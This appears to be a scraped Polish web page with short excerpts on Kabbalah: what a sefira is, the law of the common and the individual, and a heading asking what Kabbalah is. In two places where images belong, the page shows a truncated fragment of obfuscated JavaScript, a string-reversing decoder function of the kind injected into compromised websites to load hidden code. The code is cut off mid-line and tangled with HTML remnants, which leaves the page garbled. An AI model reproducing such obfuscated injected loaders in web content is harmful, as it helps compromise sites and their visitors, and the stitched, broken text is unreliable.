Co to jest SFIRA?

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3/" class="image-anchor">

1. Każda sfira jest to jedna jakość z jakości Stwórcy. (część życzenia napełnionego światłem) 2. Każda właściwość jest widzialna w tajemnicy jednego świecenia, widząc które rozumiemy tą właściwość. 3. Widząc ruch świecenia rozumiemy co odbywa się i jak Bóg steruje tymi właściwościami. 4. Sfirot mogą Świecic potężnym lub małym światłem i objawiają się w wieloobrazowości…

Prawo wspólnego i indywidualnego

Prawo wspólnego polega na tym, że cała ludzkość, w końcu swojego rozwoju, bezwzględnie powinna dojść do otwarcia wyższej sterującej siły i całkowicie poznać ją. Prawo indywidualnego polega na tym, że nawet do osiągnięcia tego doskonałego stanu przez całą ludzkość (wszystkimi duszami), w każdym pokoleniu są także oddzielne osobowości, zdolne samodzielnie osiągnąć ten stan. Taki jest…

Co to za nauka Kabbala?

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3/" class="image-anchor">